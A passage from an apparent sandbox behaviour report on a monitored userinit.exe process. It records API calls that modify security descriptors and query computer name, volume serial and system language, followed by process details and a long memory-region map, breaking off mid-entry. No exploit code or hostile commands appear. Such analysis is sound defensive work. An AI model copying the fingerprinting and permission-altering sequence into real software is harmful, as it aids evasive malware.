[0120.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.347] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0120.347] SetLastError (dwErrCode=0x0)
[0120.347] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.347] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0120.347] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0120.347] GetLastError () returned 0x0
[0120.347] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.347] SetLastError (dwErrCode=0x0)
[0120.348] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.348] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0120.348] GetSidIdentifierAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f616
[0120.348] GetLastError () returned 0x0
[0120.348] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.348] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.348] SetLastError (dwErrCode=0x0)
[0120.348] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0120.348] GetLastError () returned 0x0
[0120.348] SetLastError (dwErrCode=0x0)
[0120.348] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.348] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0120.348] GetSidSubAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a6f61c
[0120.348] GetLastError () returned 0x0
[0120.348] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.348] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.348] GetLastError () returned 0x0
[0120.348] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.348] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0120.348] AddAce (in: pAcl=0x2c7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x2b2f90, nAceListLength=0x14 | out: pAcl=0x2c7fa8) returned 1
[0120.349] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.349] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0120.349] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.349] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0120.349] SetSecurityInfo () returned 0x0
[0120.349] CloseHandle (hObject=0x1d0) returned 1
[0120.349] GetComputerNameA (in: lpBuffer=0x2a6fd84, nSize=0x1ae7c4 | out: lpBuffer="CRH2YWU7", nSize=0x1ae7c4) returned 1
[0120.349] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.349] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.350] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.350] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.350] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.350] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0120.350] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.350] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.351] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.351] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.351] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.351] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.352] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.352] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.352] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.352] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.352] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.352] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ae7ac, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1ae7c0, lpMaximumComponentLength=0x1ae7bc, lpFileSystemFlags=0x1ae7b8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ae7c0*=0x90c08a66, lpMaximumComponentLength=0x1ae7bc*=0xff, lpFileSystemFlags=0x1ae7b8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.352] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ae6b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.352] GetSystemDefaultLangID () returned 0x2a0409
[0120.352] VerLanguageNameA (in: wLang=0x409, szLang=0x1ae764, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0120.353] ExitProcess (uExitCode=0x0)
Thread:
id = 243
os_tid = 0xfd8
Thread:
id = 244
os_tid = 0xfdc
Process:
id = "35"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be760"
os_pid = "0xfd0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3506
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3507
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3508
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3509
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 3510
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3511
start_va = 0x4b0000
end_va = 0x4b8fff
entry_point = 0x4b0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3512
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3513
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3514
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3515
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3516
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3518
start_va = 0x6a0000
end_va = 0x79ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 3519
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3520
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3523
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3524
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3525
start_va = 0x2b0000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 3526
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3527
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3528
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3529
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3530
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3531
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3532
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3533
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3534
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3535
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3536
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3537
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3538
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3539
start_va = 0x170000
end_va = 0x237fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 3540
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3541
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3548
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3549
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3550
start_va = 0x2c0000
end_va = 0x3c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 3551
start_va = 0x610000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 3552
start_va = 0x7a0000
end_va = 0x139ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 3553
start_va = 0x4c0000
end_va = 0x5bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3554
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3555
start_va = 0x13a0000
end_va = 0x156ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013a0000"
filename = ""
Region:
id = 3560
start_va = 0x13a0000
end_va = 0x147efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000013a0000"
filename = ""
Region:
id = 3561
start_va = 0x1530000
end_va = 0x156ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001530000"
filename = ""
Region:
id = 3562
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3563
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 3564
start_va = 0x1570000
end_va = 0x168ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3565
start_va = 0x1690000
end_va = 0x1fbffff
entry_point = 0x1690000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3566
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 3567
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 3568
start_va = 0x1fc0000
end_va = 0x23b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001fc0000"
filename = ""
Region:
id = 3569
start_va = 0x620000
end_va = 0x69ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 3570
start_va = 0x23c0000
end_va = 0x24ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 3578
start_va = 0x24d0000
end_va = 0x25cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024d0000"
filename = ""
Region:
id = 3582
start_va = 0x25d0000
end_va = 0x27cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025d0000"
filename = ""
Region:
id = 3583
start_va = 0x1480000
end_va = 0x1500fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3587
start_va = 0x1570000
end_va = 0x15f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3588
start_va = 0x1650000
end_va = 0x168ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001650000"
filename = ""
Region:
id = 3589
start_va = 0x1480000
end_va = 0x1504fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3590
start_va = 0x1570000
end_va = 0x15f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3594
start_va = 0x1480000
end_va = 0x1508fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3595
start_va = 0x1570000
end_va = 0x15fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3596
start_va = 0x1480000
end_va = 0x150cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3597
start_va = 0x1570000
end_va = 0x15fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3601
start_va = 0x1480000
end_va = 0x1510fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3602
start_va = 0x1570000
end_va = 0x1602fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3603
start_va = 0x1480000
end_va = 0x1514fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3604
start_va = 0x1570000
end_va = 0x1606fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3608
start_va = 0x1480000
end_va = 0x1518fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3609
start_va = 0x1570000
end_va = 0x160afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3610
start_va = 0x1480000
end_va = 0x151cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3614
start_va = 0x1570000
end_va = 0x160efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3615
start_va = 0x1480000
end_va = 0x1520fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3616
start_va = 0x1570000
end_va = 0x1612fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3617
start_va = 0x1480000
end_va = 0x1524fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3620
start_va = 0x1570000
end_va = 0x1616fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3621
start_va = 0x1480000
end_va = 0x1528fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3622
start_va = 0x1570000
end_va = 0x161afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3626
start_va = 0x1480000
end_va = 0x152cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3627
start_va = 0x1570000
end_va = 0x161efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3628
start_va = 0x27d0000
end_va = 0x2880fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3631
start_va = 0x1570000
end_va = 0x1622fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3632
start_va = 0x27d0000
end_va = 0x2884fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3633
start_va = 0x1570000
end_va = 0x1626fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3636
start_va = 0x27d0000
end_va = 0x2888fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3637
start_va = 0x1570000
end_va = 0x162afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3640
start_va = 0x27d0000
end_va = 0x288cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3641
start_va = 0x1570000
end_va = 0x162efff
